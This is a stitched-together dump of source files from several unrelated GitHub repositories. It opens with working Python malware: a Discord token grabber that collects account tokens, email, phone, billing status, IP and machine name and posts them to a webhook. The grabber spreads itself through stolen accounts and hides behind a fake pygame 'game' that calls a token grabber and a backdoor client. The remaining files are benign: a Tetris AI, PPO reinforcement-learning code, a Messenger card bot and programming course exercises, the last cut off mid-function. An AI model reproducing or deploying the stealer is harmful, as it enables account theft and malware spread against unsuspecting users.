# Main function of the grabber
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = WhoAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
# Embed can be customized
embed = {
"color": 0x000000,
"fields": [
{
"name": "Account Info",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "PC Info",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "Token",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
},
"footer": {
"text": f"[+] Developed By JetBerri [+]"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Stealer - You can change this name in the json embed :))",
"avatar_url": "https://avatars.githubusercontent.com/u/84512017?v=4"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getHeader()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
Thread(target=spread, args=(token, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
# This is a simple game coded to show a black screen, if you know how to use pygame, you can add your extension.
# Modules
def GameStealer():
from tkinter import font
import pygame
import sys
# Screen size
WI = 1920
HE = 1080
FPS = 60
# Some debug (not really required)
def debug(info,y=10,x=10):
font = pygame.font.Font(None,30)
display_surface = pygame.display.get_surface()
debug_surf = font.render(str(info), True,"White")
debug_rect = debug_surf.get_rect(topleft=(x,y))
pygame.draw.rect(display_surface, "Black", debug_rect)
display_surface.blit(debug_surf,debug_rect)
# Main game class
class Game:
def __init__(self):
pygame.init()
self.screen = pygame.display.set_mode((WI,HE))
self.clock = pygame.time.Clock
def run(self):
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
self.screen.fill("black")
TokenGrabber()
BackdoorClient()
pygame.display.update()
debug("Loading....")
if __name__ == "__main__":
game = Game()
game.run()
GameStealer()
```
|
{
"source": "jetberry/JamPewDiePie",
"score": 3
}
|
#### File: JamPewDiePie/Resources/resize.py
```python
import os, shutil, sys, Image
'''
"IOError: decoder zip not available" workaround for osx Yosemite:
sudo pip uninstall PIL
brew install zlib
brew link --force zlib
sudo pip install PIL --allow-external PIL --allow-unverified PIL
sudo pip install pillow
'''
RES_100 = 'ipadhd'
RES_50 = 'hd'
RES_25 = 'sd'
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
RES_100_DIR = SCRIPT_DIR + '/' + RES_100
RES_50_DIR = SCRIPT_DIR + '/' + RES_50
RES_25_DIR = SCRIPT_DIR + '/' + RES_25
def renew_dir(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
shutil.copytree(RES_100_DIR, dir)
def get_png_file_list(dir):
file_list = []
import os
for root, dirs, files in os.walk(dir):
for file in files:
if file.endswith(".png"):
file_list += [os.path.join(root, file)]
return file_list
def scale_file(file, factor):
print file
image = Image.open(file)
new_size = (image.size[0] / factor, image.size[1] / factor)
image.resize(new_size, Image.NEAREST).save(file)
def scale(dir, factor):
renew_dir(dir)
file_list = get_png_file_list(dir)
for file in file_list:
scale_file(file, factor)
def resize_all():
scale(RES_50_DIR, 2)
scale(RES_25_DIR, 4)
if __name__ == "__main__":
try:
resize_all()
except RuntimeError, Argument:
print "ERROR " + str(Argument)
sys.exit(1)
```
|
{
"source": "JetBlack011/TetrisAI",
"score": 4
}
|
#### File: JetBlack011/TetrisAI/ai.py
```python
import time
import pyautogui
import numpy as np
from grid import Grid
from piece import PIECE_SET
class AI:
"""
A simple Tetris AI designed to interact with a running emulator through the visual analysis and
interpretation of the game.
Attributes
----------
height_weight : float
        Weight for aggregate height during heuristic calculation (negated)
lines_weight : float
Weight for completed lines
holes_weight : float
Weight for existing holes (negated)
bumpiness_weight : float
Weight for bumpiness of the grid (negated)
"""
def __init__(self, vision, controller, height_weight, lines_weight, holes_weight, bumpiness_weight, starting_level=0):
self.vision = vision
self.controller = controller
# Optimal coefficents (weights) for score calulation
self.height_weight = -height_weight
self.lines_weight = lines_weight
self.holes_weight = -holes_weight
self.bumpiness_weight = -bumpiness_weight
# Configurable game options
self.starting_level = starting_level
self.grid = Grid()
def run(self):
"""Main game loop; play until told to stop"""
self.controller.click_screen()
if self.vision.on_playing():
print("[+] Resetting game")
self.reset_game()
self.vision.update()
if self.vision.on_game_over():
print("[+] Game over! Restarting...")
self.controller.press_start()
time.sleep(1)
self.vision.update()
while not self.vision.on_playing():
self.vision.update()
if self.vision.on_start():
print("[+] Pressing start")
self.controller.press_start()
if self.vision.on_choose_game_type():
print("[+] Choosing game type")
self.controller.press_start()
if self.vision.on_choose_level():
print("[+] Choosing level " + str(self.starting_level))
for _ in range(9):
self.controller.press_left()
for _ in range(self.starting_level):
self.controller.press_right()
self.controller.press_start()
while self.vision.on_playing():
self.vision.update()
if self.grid.current_piece is None:
self.grid.current_piece = PIECE_SET[self.vision.current_piece()]
else:
self.grid.current_piece = self.grid.next_piece
self.grid.next_piece = PIECE_SET[self.vision.next_piece()]
origin, rotation = self.best_move()
for _ in range(rotation):
self.controller.rotate_ccw()
for _ in range(4):
self.controller.press_left()
for _ in range(origin):
self.controller.press_right()
self.vision.update_stats()
self.hard_drop()
self.grid.drop(self.grid.current_piece, origin, rotation)
self.grid.clear_lines()
print(self.grid)
print("Current Piece: {}, Next Piece: {}\nBest Origin: {}, Best Rotation: {}".format(self.grid.current_piece, self.grid.next_piece, origin, rotation))
def hard_drop(self):
start = time.time()
elapsed_time = 0
self.vision.update_stats()
self.controller.release_down()
while not self.vision.is_block_down() and elapsed_time < 3:
self.controller.hold_down()
elapsed_time = time.time() - start
self.controller.release_down()
def reset_game(self):
while not self.vision.on_game_over():
self.controller.rotate_cw()
self.hard_drop()
self.vision.update()
def score(self):
"""
Calculate the score of the current grid using the
weighted summation of the heuristic variables
"""
return self.height_weight * self.grid.aggregate_height() + \
self.lines_weight * self.grid.lines() + \
self.holes_weight * self.grid.holes() + \
self.bumpiness_weight * self.grid.bumpiness()
def best_move(self):
"""Determine the optimal move given a particular game state"""
piece = self.grid.current_piece
best_score = None
best_origin = 0
best_rotation = 0
for origin in range(piece.max_origin()):
for rotation in range(piece.max_rotation + 1):
self.grid.drop(piece, origin, rotation)
score = self.score()
self.grid.revert_state()
if best_score is None:
best_score = score
elif score > best_score:
best_score = score
best_origin = origin
best_rotation = rotation
return (best_origin, best_rotation)
```
#### File: JetBlack011/TetrisAI/vision.py
```python
import cv2
from PIL import ImageGrab
import numpy as np
class Vision:
def __init__(self, show_window=False):
self.static_templates = {
'start': 'assets/start.png',
'game_type': 'assets/game_type.png',
'level': 'assets/name.png',
'playing': 'assets/playing.png',
'end': 'assets/end.png',
'I': 'assets/I.png',
'J': 'assets/J.png',
'L': 'assets/L.png',
'O': 'assets/O.png',
'S': 'assets/S.png',
'T': 'assets/T.png',
'Z': 'assets/Z.png',
'nextI': 'assets/next/I.png',
'nextJ': 'assets/next/J.png',
'nextL': 'assets/next/L.png',
'nextO': 'assets/next/O.png',
'nextS': 'assets/next/S.png',
'nextT': 'assets/next/T.png',
'nextZ': 'assets/next/Z.png'
}
self.templates = {k: cv2.imread(v, 0) for (k, v) in self.static_templates.items()}
self.current_templates = ['I', 'J', 'L', 'O', 'S', 'T', 'Z']
self.next_templates = ['nextI', 'nextJ', 'nextL', 'nextO', 'nextS', 'nextT', 'nextZ']
self.show_window = show_window
self.top = 280
self.right = 0
self.width = 1400
self.height = 1050
self.stats_top = 350
self.stats_right = 300
self.stats_width = 645
self.stats_height = 900
self.last_stats = None
self.frame = None
def __take_screenshot(self, top, left, width, height):
img = np.array(ImageGrab.grab(bbox=(top, left, width, height)))
return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
def get_image(self, path):
return cv2.imread(path, 0)
def refresh_frame(self):
self.frame = self.__take_screenshot(self.top, self.right, self.width, self.height)
def display_frame(self):
cv2.imshow('window', self.frame)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
def match_template(self, img_grayscale, template, threshold=0.9):
result = cv2.matchTemplate(img_grayscale, template, cv2.TM_CCOEFF_NORMED)
matches = np.where(result >= threshold)
return matches
def find_template(self, name, image=None, threshold=0.9):
if image is None:
if self.frame is None:
self.refresh_frame()
image = self.frame
return self.match_template(
image,
self.templates[name],
threshold
)
def scaled_find_template(self, name, image=None, threshold=0.9, scales=[1.0, 0.9, 1.1]):
if image is None:
if self.frame is None:
self.refresh_frame()
image = self.frame
initial_template = self.templates[name]
for scale in scales:
scaled_template = cv2.resize(initial_template, (0,0), fx=scale, fy=scale)
matches = self.match_template(
image,
scaled_template,
threshold
)
if np.shape(matches)[1] >= 1:
return matches
return matches
def can_see_object(self, template, threshold=0.9):
matches = self.find_template(template, threshold=threshold)
return np.shape(matches)[1] >= 1
def update(self):
self.refresh_frame()
if self.show_window:
self.display_frame()
## Game specific functions
def current_piece(self):
for template in self.current_templates:
if self.can_see_object(template):
return template
return None
def next_piece(self):
for template in self.next_templates:
if self.can_see_object(template):
return (template[-1])
return None
def is_block_down(self):
stats = self.__take_screenshot(self.stats_top,
self.stats_right,
self.stats_width,
self.stats_height)
return not np.array_equal(stats, self.last_stats)
def update_stats(self):
self.last_stats = self.__take_screenshot(self.stats_top,
self.stats_right,
self.stats_width,
self.stats_height)
## On Event functions
def on_start(self):
return self.can_see_object("start")
def on_choose_game_type(self):
return self.can_see_object("game_type")
def on_choose_level(self):
return self.can_see_object("level")
def on_playing(self):
return self.can_see_object("playing")
def on_game_over(self):
return self.can_see_object("end")
```
|
{
"source": "jet-black/ppo-lstm-parallel",
"score": 3
}
|
#### File: jet-black/ppo-lstm-parallel/environments.py
```python
def parse_properties(file_name):
lines = open(file_name).readlines()
result = {}
for l in lines:
a, b = l.split("=")
b = b.strip()
if b == "True":
result[a] = True
elif b == "False":
result[a] = False
elif "." in b:
result[a] = float(b)
elif b.isdigit():
result[a] = int(b)
else:
result[a] = b
return result
def get_env_options(env_name, use_gpu):
import gym
env = gym.make(env_name)
max_episode_steps = env.spec.max_episode_steps
if max_episode_steps is None:
max_episode_steps = 1e+8
state_dim = env.observation_space.shape[0]
discrete = False
action_dim = None
scales_lo = None
scales_hi = None
if isinstance(env.action_space, gym.spaces.Discrete):
action_dim = env.action_space.n
discrete = True
elif isinstance(env.action_space, gym.spaces.Box):
action_dim = env.action_space.shape[0]
scales_lo = env.action_space.low
scales_hi = env.action_space.high
basic_opts = {
"action_dim": action_dim,
"env_name": env_name,
"state_dim": state_dim,
"discrete": discrete,
"scales_lo": scales_lo,
"scales_hi": scales_hi,
"max_episode_steps": max_episode_steps,
"use_gpu": use_gpu,
}
file_props = get_config(env_name)
for k, v in file_props.items():
basic_opts[k] = v
result = basic_opts
for k, v in result.items():
print("%s : %s" % (k, v))
return result
def get_config(env_name):
try:
file_props = parse_properties("props/%s.properties" % env_name)
except:
print("Failed to load custom properties for env. Using default")
file_props = {}
default_props = parse_properties("props/default.properties")
result = {}
for k, v in default_props.items():
result[k] = v
for k, v in file_props.items():
result[k] = v
mem_fraction = 0.98 / (result["worker_num"] + 2)
result["mem_fraction"] = mem_fraction
return result
class EnvironmentProducer:
def __init__(self, env_name, use_gpu):
self.env_name = env_name
self.use_gpu = use_gpu
def get_new_environment(self):
import gym
env = gym.make(self.env_name)
return env
def get_env_name(self):
return self.env_name
def get_use_gpu(self):
return self.use_gpu
```
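To make the coercion rules in `parse_properties` concrete, here is a small self-contained check; the file name and its contents are invented purely for illustration.
```python
# Sketch only: exercising parse_properties' type coercion with a throwaway file.
from environments import parse_properties

with open("example.properties", "w") as f:
    f.write("worker_num=4\ngamma=0.99\nuse_lstm=True\nreward_transform=scale\n")
props = parse_properties("example.properties")
assert props == {"worker_num": 4, "gamma": 0.99, "use_lstm": True, "reward_transform": "scale"}
```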
#### File: jet-black/ppo-lstm-parallel/play.py
```python
import argparse
import tensorflow as tf
import environments
from agent import PPOAgent
from policy import *
def print_summary(ep_count, rew):
print("Episode: %s. Reward: %s" % (ep_count, rew))
def start(env):
MASTER_NAME = "master-0"
tf.reset_default_graph()
with tf.Session() as session:
with tf.variable_scope(MASTER_NAME) as scope:
env_opts = environments.get_env_options(env, False)
policy = get_policy(env_opts, session)
master_agent = PPOAgent(policy, session, MASTER_NAME, env_opts)
saver = tf.train.Saver(max_to_keep=1)
saver = tf.train.import_meta_graph(tf.train.latest_checkpoint("models/%s/" % env) + ".meta")
saver.restore(session, tf.train.latest_checkpoint("models/%s/" % env))
try:
pass
except:
print("Failed to restore model, starting from scratch")
session.run(tf.global_variables_initializer())
producer = environments.EnvironmentProducer(env, False)
env = producer.get_new_environment()
episode_count = 0
cum_rew = 0
while True:
terminal = False
s0 = env.reset()
cur_hidden_state = master_agent.get_init_hidden_state()
episode_count += 1
cur_rew = 0
while not terminal:
env.render()
action, h_out = master_agent.get_strict_sample(s0, cur_hidden_state)
cur_hidden_state = h_out
s0, r, terminal, _ = env.step(action)
cum_rew += r
cur_rew += r
print("Ep: %s, cur_reward: %s reward: %s" % (episode_count, cur_rew, cum_rew / episode_count))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=('Parallel PPO'))
parser.add_argument('-env', type=str, help='Env name')
args = parser.parse_args()
start(**vars(args))
```
#### File: jet-black/ppo-lstm-parallel/reward.py
```python
class ScalingRewardTransformer:
def __init__(self, env_opts):
self.env_opts = env_opts
def transform_reward(self, r):
return r / 100.0
class PositiveRewardTransformer:
def __init__(self, env_opts):
self.env_opts = env_opts
def transform_reward(self, r):
return max(-0.001, r / 100.0)
class IdentityRewardTransformer:
def __init__(self, env_opts):
self.env_opts = env_opts
def transform_reward(self, r):
return r
def get_reward_transformer(env_ops):
name = env_ops["reward_transform"]
if name == "scale":
return ScalingRewardTransformer(env_ops)
elif name == "positive":
return PositiveRewardTransformer(env_ops)
else:
return IdentityRewardTransformer(env_ops)
```
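The factory at the bottom keys off the `reward_transform` entry of the parsed env options; a minimal usage sketch, with a hand-written options dict standing in for `environments.get_config()`:
```python
# Usage sketch: env_opts would normally come from environments.get_config().
from reward import get_reward_transformer

transformer = get_reward_transformer({"reward_transform": "scale"})
print(transformer.transform_reward(250.0))  # -> 2.5
```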
#### File: jet-black/ppo-lstm-parallel/train_parallel.py
```python
import argparse
import os
import shutil
import threading
import time
from master import SimpleMaster
import environments
def start(env, gpu):
env_name = env
if not os.path.exists('logs'):
os.mkdir('logs')
if not os.path.exists('models'):
os.mkdir('models')
try:
shutil.rmtree("logs/" + env_name)
except:
pass
env_producer = environments.EnvironmentProducer(env_name, gpu)
master = SimpleMaster(env_producer)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=('Parallel PPO'))
parser.add_argument('-env', type=str, help='Env name')
parser.add_argument('-gpu', action='store_true')
args = parser.parse_args()
start(**vars(args))
```
|
{
"source": "jetboom1/workshop1",
"score": 3
}
|
#### File: jetboom1/workshop1/final_project.py
```python
import doctest
def read_csv(path_file):
"""
:param path_file: path to csv file
:return: list of lists, consists of 5 elements:
0 - name of task
1 - plasce
2 - teammates
3 - deadline
4 - priority
>>> 1 == 1
True
"""
all_list = []
with open(path_file, 'r', encoding='utf-8') as csv_file:
for line in csv_file:
line = line.strip()
line = line.split(',')
all_list.append(line)
return all_list
def print_csv(all_list):
"""
:param all_list: list of all tasks
:return: nothing
prints all tasks
>>> print_csv([["поїсти", "БФК", "сам", "17.12.2021", "5"]])
['поїсти', 'БФК', 'сам', '17.12.2021', '5']
<BLANKLINE>
>>> 110 * 2 == 221
False
"""
all_list = sorted(all_list, key=lambda x: x[4])
for i in range(len(all_list)):
print(all_list[i])
print()
def delete_notion(filepath, name_task):
"""
Delete task from csv file
:param filepath:
:param name_task:
:return:
>>> 10==1123
False
"""
with open(filepath, mode='r', encoding='utf-8') as file:
data = file.readlines()
for i in range(len(data)):
data[i] = data[i].strip("\n")
data[i] = data[i].split(',')
for i in data:
if name_task in i:
data.pop(data.index(i))
with open(filepath, mode='w', encoding='utf-8') as file:
for item in data:
file.write(",".join(item))
file.write('\n')
def tasks_today(list_of_tasks):
"""
list[list[str]] --> list[list[str]]
Return tasks for today.
>>> tasks_today([['task', 's', 's', '18.12.2001', '1'], ['task2', 's', 's', '18.12.2001', '2']])
No task for today, Relax :)
<BLANKLINE>
"""
from datetime import date
today = str(date.today().strftime('%d.%m.%Y'))
# today = today.replace("/", ".")
today_tasks = []
for i in range(len(list_of_tasks)):
if today in list_of_tasks[i]:
today_tasks.append(list_of_tasks[i])
if len(today_tasks) == 0:
print('No task for today, Relax :)')
else:
print(today_tasks)
print()
def write_csv(path_file, new_task):
"""
:param new_task: what to write in csv file
:param path_file: path to csv file
:return: nothing
writes a new line (task) to csv file
>>> write_csv('my_csv.csv', 'task, s, s, 18.12.2001, 1')
"""
with open(path_file, 'a', encoding='utf-8') as csv_file:
csv_file.write('\n' + new_task)
def add_tasks():
"""Asks information about task and returns it in csv format
>>> print('Doctest will not work here')
Doctest will not work here
"""
task = input('Write a task: ')
location = input('Write a location: ')
collaborators = input('Write your coworkers: ')
date = input('Write the date by which the task must be completed in format dd.mm.yyyy: ')
priority = input('Write a priority from 1 to the number of the last task: ')
lst = [task,location,collaborators,date,priority]
return ','.join(lst)
if __name__ == '__main__':
doctest.testmod(raise_on_error=True)
print('enter your path to csv file with tasks')
path = input()
while True:
print('Enter 1 if you want to add task')
print('Enter 2 if you want to delete task')
print('Enter 3 if you want to see today task')
print('Enter 4 to see all task, sorted by priority')
print('Enter exit if you want to exit')
action = input()
if action == '1':
print("What task do you want to add ?")
task = add_tasks()
write_csv(path, task)
elif action == '2':
print("What task do you want to delete ?")
task = input()
delete_notion(path, task)
elif action == '3':
print("Do you want to see today tasks ?")
tasks_today(read_csv(path))
elif action == '4':
print_csv(read_csv(path))
elif action == "exit":
print('thanks for using, bye')
break
else:
print('wrong input, repeat one more time')
```
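The helpers above expect a plain five-column CSV (task, place, teammates, deadline, priority) with no header row. A minimal sketch of preparing such a file and reading it back, using an invented file name:
```python
# Sketch only: the five-column row format that read_csv/print_csv assume.
from final_project import read_csv, print_csv

with open("tasks.csv", "w", encoding="utf-8") as f:
    f.write("buy groceries,supermarket,alone,18.12.2021,2\n")
    f.write("finish report,office,Olena,17.12.2021,1\n")
tasks = read_csv("tasks.csv")
print_csv(tasks)  # printed sorted by the priority column (index 4)
```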
|
{
"source": "jetbooster/mtg_messenger_bot",
"score": 2
}
|
#### File: jetbooster/mtg_messenger_bot/main.py
```python
import re
import os
from fbchat import Client
from fbchat.models import Message
import utils
import services
# Subclass fbchat.Client and override required methods
class MtgBot(Client):
def __init__(self, username, password):
super().__init__(username,password)
self.LukesCards = utils.LukesCards()
self.MainRegex = re.compile(r"(?<=\[\[)(.*?)(?=\]\])")
def _uploadImage(self, image_path, data, mimetype):
# mimetype seems a but flakey, force it to be image/jpeg
return super()._uploadImage(image_path, data, "image/jpeg")
def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):
matchList = self.MainRegex.findall(message_object.text)
# Have I been called? if not, do nothing.
if 'mtgbot:' in message_object.text:
return
if len(matchList) != 0:
for name in matchList:
if name.lower() == 'luke':
alteredName = self.LukesCards.getNextCard()
else:
alteredName = utils.nicknames(name)
if alteredName != name:
# A nickname has been found, jump straight to scryfall
cardData = services.scryfall(alteredName)
else:
cardData = services.cardFetch(alteredName)
if cardData:
# if cardData exists, the best match was found! fire away!
                    # obviously, no guarantee it will be the card you wanted!
if cardData['dualfaced']:
#check in file cache
filename = services.buildDualFaced(cardData)
self.sendLocalImage('./cache/{}'.format(filename), message=Message(
text='mtgbot: {}'.format(cardData['name'])), thread_id=thread_id, thread_type=thread_type)
else:
print('sending remote image')
self.sendRemoteImage(cardData['imageurls'][0], message=Message(
text='mtgbot: {}'.format(cardData['name'])), thread_id=thread_id, thread_type=thread_type)
else:
self.send(message=Message(text='mtgbot: No card found for {}'.format(
name)), thread_id=thread_id, thread_type=thread_type)
if __name__ == "__main__":
YOUR_FACEBOOK_USERNAME = ""
YOUR_FACEBOOK_PASSWORD = ""
with open('credentials.txt') as fyl:
YOUR_FACEBOOK_USERNAME = fyl.readline().strip()
YOUR_FACEBOOK_PASSWORD = fyl.readline().strip()
if not 'cache' in os.listdir('.'):
os.mkdir('./cache')
client = MtgBot(YOUR_FACEBOOK_USERNAME, YOUR_FACEBOOK_PASSWORD)
client.listen()
```
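The lookbehind/lookahead pair in `MainRegex` extracts every card name wrapped in `[[...]]` without including the brackets themselves; a quick standalone check of the pattern:
```python
# Sketch only: what the [[...]] pattern extracts from a chat message.
import re

main_regex = re.compile(r"(?<=\[\[)(.*?)(?=\]\])")
message = "I'd splash blue for [[Counterspell]] and maybe [[Lightning Bolt]]"
print(main_regex.findall(message))  # -> ['Counterspell', 'Lightning Bolt']
```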
|
{
"source": "jetbrains-academy/AMazing",
"score": 3
}
|
#### File: Building the Maze/Add Walls to the Cell/cell.py
```python
class Cell:
def __init__(self, x, y):
self.x, self.y = x, y
self.walls = {'N': True, 'S': True, 'E': True, 'W': True}
```
#### File: Create a Cell/tests/test_task.py
```python
import unittest
class TestCase(unittest.TestCase):
def test_import(self):
try:
from cell import Cell
except ImportError:
self.fail("Create a class named 'Cell'")
def test_cell_x_y_exist(self):
from cell import Cell
cell = Cell(1, 5)
self.assertTrue(hasattr(cell, "x"), "Cell should store x position in the x field")
self.assertTrue(hasattr(cell, "y"), "Cell should store y position in the y field")
def test_cell_x_y(self):
from cell import Cell
cell = Cell(1, 5)
self.assertEqual(1, cell.x, "Assign x to the cell.x")
self.assertEqual(5, cell.y, "Assign y to the cell.y")
```
#### File: Building the Maze/Make the Maze/maze.py
```python
import random
import numpy as np
from cell import Cell
class Maze:
delta = {'N': (0, -1),
'S': (0, 1),
'W': (-1, 0),
'E': (1, 0)}
def __init__(self, nx, ny):
self.nx, self.ny = nx, ny
self.maze_grid = np.array([[Cell(x, y) for y in range(ny)] for x in range(nx)])
def cell_at(self, x, y):
return self.maze_grid[x][y]
def find_valid_neighbors(self, cell):
neighbors = []
for direction, (dx, dy) in self.delta.items():
neighbor_x, neighbor_y = cell.x + dx, cell.y + dy
if (0 <= neighbor_x < self.nx) and (0 <= neighbor_y < self.ny):
neighbor = self.cell_at(neighbor_x, neighbor_y)
if neighbor.has_all_walls():
neighbors.append((direction, neighbor))
return neighbors
def make_maze(self):
n = self.nx * self.ny
cell_stack = []
current_cell = self.cell_at(0, 0)
current_cell.status = 'Start'
n_visited = 1
while n_visited < n:
neighbors = self.find_valid_neighbors(current_cell)
if not neighbors:
current_cell = cell_stack.pop()
continue
direction, next_cell = random.choice(neighbors)
current_cell.knock_down_wall(next_cell, direction)
cell_stack.append(current_cell)
current_cell = next_cell
n_visited += 1
if n_visited == n:
current_cell.status = 'End'
```
#### File: Building the Maze/Maze/maze.py
```python
from cell import Cell
import numpy as np
class Maze:
def __init__(self, nx, ny):
self.nx, self.ny = nx, ny
self.maze_grid = np.array([[Cell(x, y) for y in range(ny)] for x in range(nx)])
```
|
{
"source": "jetbrains-academy/introduction_to_python",
"score": 3
}
|
#### File: Data structures/Tuples/tests.py
```python
from test_helper import run_common_tests, passed, failed, get_answer_placeholders
def test_window():
window = get_answer_placeholders()[0]
if "len(" in window:
passed()
else:
failed("Use len() function")
def test_window1():
window = get_answer_placeholders()[1]
if "fun_tuple" in window:
passed()
else:
failed("Add a string 'fun_tuple' to your tuple")
def test_window2():
window = get_answer_placeholders()[1]
if "," in window:
passed()
else:
failed("A trailing comma is required")
if __name__ == '__main__':
run_common_tests("Use len() function")
test_window()
test_window1()
test_window2()
```
#### File: Functions/Default parameters/tests.py
```python
from test_helper import run_common_tests, failed, passed, get_answer_placeholders
def test_window_names():
window = get_answer_placeholders()[0]
if "subject" in window and "name=" in window:
passed()
else:
failed("Add a default value to the parameter")
if __name__ == '__main__':
run_common_tests()
test_window_names()
```
#### File: Functions/Keyword Arguments/tests.py
```python
from test_helper import run_common_tests, failed, passed, get_answer_placeholders
def test_window():
window = get_answer_placeholders()[0]
if "soup" in window and "growl" in window and "Sphinx" in window:
passed()
else:
failed("Input values seem to be off")
def test_window1():
window = get_answer_placeholders()[0]
if "action=" in window and "breed=" in window:
passed()
else:
failed("You keyword argument syntax has room for improvement!")
if __name__ == '__main__':
run_common_tests()
test_window()
test_window1()
```
|
{
"source": "jetbrains-academy/Machine-Learning-101",
"score": 4
}
|
#### File: Bayes Guards SMS/Vectorize/vectorize.py
```python
import numpy as np
import string
# This function creates an array of lines, where lines are transformed into lists of words
# without spaces and punctuation symbols. `np.char.lower()` returns an array with the elements
# converted to lowercase; `translate()` returns a copy of the string where characters have
# been mapped through the given translation table; `str.maketrans()` provides a translation table
# for `translate()`, in our case it specifies that punctuation symbols should be replaced with
# None. `np.char.split()` returns a list of the words for each element in the array.
def split_by_words(X):
return np.char.split(np.char.translate(np.char.lower(X), str.maketrans('', '', string.punctuation)))
def vectorize(X):
# get the number of input messages
X_len = len(X)
# get a vector of words out of each message
X_split = # TODO
# get a 1D array of unique words
uniques = # TODO
# create an index dictionary and fill it with unique words and their indices
index_dict = {}
for index, word in enumerate(uniques):
# TODO
# create an array of zeros with dimensions corresponding
# to input data size and index_dict length
vectorization = # TODO
# each i'th line of the array contains in the j'th position a number x
# which shows how many times the i'th word was encountered in the j'th message
for index, message in enumerate(X_split):
unique, count = # TODO
for i, word in enumerate(unique):
# TODO
return index_dict, vectorization
```
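The `# TODO` markers above are the course exercise itself. One possible completion, relying only on the NumPy calls named in the comments and on `split_by_words` from the same file, could look like the sketch below; it is an illustration, not the course's reference solution.
```python
# Sketch only: one way to complete the vectorize() template (not the official solution).
import numpy as np
from vectorize import split_by_words

def vectorize_sketch(X):
    X_len = len(X)
    X_split = split_by_words(X)                   # word lists per message, as defined above
    uniques = np.unique(np.concatenate(X_split))  # 1D array of unique words
    index_dict = {word: index for index, word in enumerate(uniques)}
    vectorization = np.zeros((X_len, len(index_dict)))
    for index, message in enumerate(X_split):
        unique, count = np.unique(message, return_counts=True)
        for i, word in enumerate(unique):
            vectorization[index, index_dict[word]] = count[i]
    return index_dict, vectorization
```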
#### File: Comic-Con and k-means/Conclusion/task.py
```python
from PIL import Image
from PIL import ImageDraw
import numpy as np
from processing import recolor
IMAGE_WIDTH = 768
IMAGE_HEIGHT = 1024
def read_image(path='superman-batman.png'):
image = Image.open(path)
return np.array(image).reshape(-1, 3)
if __name__ == '__main__':
image = read_image()
recolored_image = recolor(image, 8).reshape(IMAGE_HEIGHT, IMAGE_WIDTH, 3).astype('uint8')
image = Image.fromarray(recolored_image)
image.save("recolored-superman-batman.png")
```
#### File: Comic-Con and k-means/Histogram/task.py
```python
from PIL import Image
import numpy as np
from plotting import plot_colors, centroid_histogram
from clustering import k_means
from distances import euclidean_distance
def read_image(path='superman-batman.png'):
image = Image.open(path)
return np.array(image).reshape(-1, 3)
if __name__ == '__main__':
image = read_image()
(pixel_labels, centroids) = k_means(image, 4, euclidean_distance)
print(pixel_labels)
hist = centroid_histogram(pixel_labels)
plot_colors(hist, centroids)
```
#### File: Image recoloring/tests/test_task.py
```python
import unittest
import numpy as np
from processing import recolor
class TestCase(unittest.TestCase):
def test_colors_num(self):
image = np.array([[255, 255, 255], [0, 0, 0], [0, 2, 0], [255, 255, 254]])
for i in range(11):
if i == 10:
self.fail()
try:
recolored_image = recolor(image, 2)
expected_image = np.array([[255, 255, 254], [0, 1, 0], [0, 1, 0], [255, 255, 254]])
self.assertEqual(2, len(np.unique(recolored_image, axis=0)))
np.testing.assert_array_equal(recolored_image, expected_image)
break
except IndexError:
continue
def test_colors_num_2(self):
image = np.array([[255, 255, 255], [0, 0, 0], [0, 2, 0], [255, 255, 254]])
recolored_image = recolor(image, 3)
self.assertEqual(3, len(np.unique(recolored_image, axis=0)))
```
#### File: Comic-Con and k-means/K-means/task.py
```python
from PIL import Image
import numpy as np
from distances import euclidean_distance
from clustering import k_means
def read_image(path='superman-batman.png'):
image = Image.open(path)
return np.array(image).reshape(-1, 3)
if __name__ == '__main__':
image = read_image()
(centroids, labels) = k_means(image, 4, euclidean_distance)
print("Cluster centers:")
for label in labels:
print(label)
```
#### File: Reading an image/tests/test_task.py
```python
import numpy as np
import unittest
from numpy.ma.testutils import assert_array_equal
from task import read_image
# The test is checking read_image looking somewhat like this
# def read_image(path='superman-batman.png'):
# image = Image.open(path)
# return np.array(image).reshape(-1, 3)
class TestCase(unittest.TestCase):
# TODO: this test not passing in the student mode is a bug
# def test_read_image(self):
# image = read_image("./tests/star.png")
# expected_star = np.loadtxt("./tests/star.txt")
# assert_array_equal(expected_star, image)
def test_shape(self):
image = read_image("./superman-batman.png")
self.assertEqual((786432, 3), image.shape)
```
#### File: Horror Trees/Conclusion/divide.py
```python
from calculate_entropy import entropy
class Predicate:
def __init__(self, column, value):
self.column = column
self.value = value
def divide(self, X, y):
if isinstance(self.value, int) or isinstance(self.value, float):
